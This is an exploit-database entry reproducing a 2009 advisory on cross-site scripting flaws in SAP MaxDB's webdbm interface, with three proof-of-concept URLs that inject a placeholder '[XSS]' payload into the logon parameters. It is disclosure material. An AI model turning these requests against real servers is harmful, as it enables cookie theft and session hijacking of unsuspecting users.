SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities

Author: Digital Security Research Group
type: remote
platform: windows
port: 
date_added: 2009-03-31  
date_updated: 2014-04-15  
verified: 1  
codes: CVE-2007-4475;OSVDB-53066  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32879.html  
source: https://www.securityfocus.com/bid/34319/info

SAP MaxDB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS]
http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS]
http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS]